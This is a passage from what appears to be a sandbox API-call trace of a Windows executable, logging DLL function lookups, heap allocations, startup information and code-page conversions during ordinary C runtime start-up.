(hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0212.446] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0212.447] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0212.448] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0212.449] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0212.450] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0212.450] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0212.450] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0212.451] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0212.452] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0212.452] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0212.452] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0212.452] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0212.452] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0212.452] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0212.452] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0212.452] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0212.453] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0212.453] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0212.453] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0212.453] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0212.454] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0212.454] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0212.454] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0212.454] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0212.454] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0213.040] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0213.040] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0213.040] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0213.041] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0213.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3767e580, dwHighDateTime=0x1d68287)) [0213.047] GetCurrentThreadId () returned 0xb20 [0213.047] GetCurrentProcessId () returned 0x570 [0213.047] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=33338591290) returned 1 [0213.052] GetProcessHeap () returned 0x570000 [0213.399] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0213.400] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0213.400] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0213.401] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0213.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0213.402] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0213.402] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0213.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0213.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0213.403] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0213.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0213.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0213.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0213.405] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0213.419] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3bc) returned 0x587090 [0213.419] GetCurrentThreadId () returned 0xb20 [0213.419] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x587458 [0213.419] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x587478 [0213.420] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xf593e1d6, hStdError=0x0)) [0213.420] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0213.420] GetFileType (hFile=0x3) returned 0x2 [0213.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.421] GetFileType (hFile=0x7) returned 0x2 [0213.421] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0213.421] GetFileType (hFile=0xb) returned 0x2 [0213.422] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0213.422] GetEnvironmentStringsW () returned 0x587c80* [0213.422] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xb7c) returned 0x588808 [0213.489] FreeEnvironmentStringsW (penv=0x587c80) returned 1 [0213.490] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0213.490] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x94) returned 0x587c80 [0213.493] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xa0) returned 0x587d20 [0213.493] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x584dc0 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6c) returned 0x587dc8 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6e) returned 0x587e40 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x78) returned 0x57f8f0 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x587eb8 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x587f28 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x587f60 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x20) returned 0x586a60 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x587fb0 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x586a88 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4a) returned 0x587fe0 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x72) returned 0x57f970 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x588038 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x588070 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x586ab0 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd2) returned 0x5880a8 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x7c) returned 0x588188 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x588210 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x584e08 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x588250 [0213.495] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x5882e8 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x588318 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x588350 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x588390 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x5883e0 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x584e50 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x588440 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x82) returned 0x588460 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5884f0 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x586ad8 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x588528 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x588560 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x5885c0 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x588620 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x584e98 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x588658 [0213.496] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x5886b8 [0213.497] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x5886e8 [0213.497] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x8c) returned 0x588720 [0213.497] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588808 | out: hHeap=0x570000) returned 1 [0213.746] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x5887b8 [0213.746] GetLastError () returned 0x0 [0213.746] SetLastError (dwErrCode=0x0) [0213.746] GetLastError () returned 0x0 [0213.746] SetLastError (dwErrCode=0x0) [0213.747] GetLastError () returned 0x0 [0213.747] SetLastError (dwErrCode=0x0) [0213.747] GetACP () returned 0x4e4 [0213.747] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x220) returned 0x588fc0 [0213.747] GetLastError () returned 0x0 [0213.747] SetLastError (dwErrCode=0x0) [0213.747] IsValidCodePage (CodePage=0x4e4) returned 1 [0213.747] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0213.747] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0213.750] GetLastError () returned 0x0 [0213.750] SetLastError (dwErrCode=0x0) [0213.750] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.752] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0213.752] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0213.752] GetLastError () returned 0x0 [0213.752] SetLastError (dwErrCode=0x0) [0213.752] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.752] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0213.752] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0213.752] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0213.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFà\x93õäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0213.752] GetLastError () returned 0x0 [0213.753] SetLastError (dwErrCode=0x0) [0213.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0213.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0213.753] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" 